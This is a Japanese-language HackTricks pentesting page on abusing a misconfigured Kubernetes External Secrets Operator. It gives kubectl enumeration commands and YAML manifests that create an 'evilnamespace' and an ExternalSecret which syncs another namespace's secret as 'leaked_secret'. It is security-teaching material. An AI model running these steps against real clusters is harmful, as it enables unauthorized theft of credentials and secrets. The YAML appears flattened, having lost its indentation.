Files
hacktricks-cloud/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md

4.0 KiB
Raw Blame History

External Secret Operator

{{#include ../../banners/hacktricks-training.md}}

このページの元の著者は Fares

このページでは、誤って構成されたESOまたはESOを使用して秘密を同期するアプリケーションから秘密を盗む方法についてのいくつかのポイントを示します。

免責事項

以下に示す技術は、特定の条件が満たされる場合にのみ機能します。たとえば、あなたが所有または侵害した名前空間で秘密を同期するために必要な要件に依存します。自分で見つける必要があります。

前提条件

  1. 名前空間での管理者権限を持つkubernetes / openshiftクラスターへの足場
  2. クラスターレベルでの少なくともExternalSecretへの読み取りアクセス
  3. ESOがあなたの秘密を同期するために必要なラベル/アノテーションまたはグループメンバーシップがあるかどうかを確認します。運が良ければ、定義された秘密を自由に盗むことができます。

既存のClusterSecretStoreに関する情報収集

このリソースを読むのに十分な権限を持つユーザーがいると仮定して、まず既存の_ClusterSecretStores_をリストアップすることから始めます。

kubectl get ClusterSecretStore

ExternalSecretの列挙

ClusterSecretStoreの名前が mystore であると仮定します。その関連するexternalsecretを列挙します。

kubectl get externalsecret -A | grep mystore

このリソースは名前空間スコープであるため、どの名前空間を探すべきかすでに知っていない限り、-Aオプションを追加してすべての名前空間を横断して探してください。

定義されたexternalsecretのリストが得られるはずです。_mysecretというexternalsecretオブジェクトがmynamespace_名前空間によって定義され、使用されていると仮定しましょう。それが保持している秘密の種類について、もう少し情報を集めてください。

kubectl get externalsecret myexternalsecret -n mynamespace -o yaml

部品の組み立て

ここから、1つまたは複数のシークレット名Secretリソースで定義されているようにを取得できます。出力は次のようになります:

kind: ExternalSecret
metadata:
annotations:
...
labels:
...
spec:
data:
- remoteRef:
conversionStrategy: Default
decodingStrategy: None
key: SECRET_KEY
secretKey: SOME_PASSWORD
...

これまでに得たものは次のとおりです:

  • ClusterSecretStoreの名前
  • ExternalSecretの名前
  • シークレットの名前

必要なものがすべて揃ったので、ExternalSecretを作成できます最終的には、新しいシークレットを同期させるために必要な前提条件を満たすために、新しいNamespaceをパッチまたは作成することになります

kind: ExternalSecret
metadata:
name: myexternalsecret
namespace: evilnamespace
spec:
data:
- remoteRef:
conversionStrategy: Default
decodingStrategy: None
key: SECRET_KEY
secretKey: SOME_PASSWORD
refreshInterval: 30s
secretStoreRef:
kind: ClusterSecretStore
name: mystore
target:
creationPolicy: Owner
deletionPolicy: Retain
name: leaked_secret
kind: Namespace
metadata:
annotations:
required_annotation: value
other_required_annotation: other_value
labels:
required_label: somevalue
other_required_label: someothervalue
name: evilnamespace

数分後、同期条件が満たされていれば、あなたのネームスペース内で漏洩したシークレットを表示できるはずです。

kubectl get secret leaked_secret -o yaml

参考文献

{{#ref}} https://external-secrets.io/latest/ {{#endref}}

{{#ref}} https://github.com/external-secrets/external-secrets {{#endref}}

{{#include ../../banners/hacktricks-training.md}}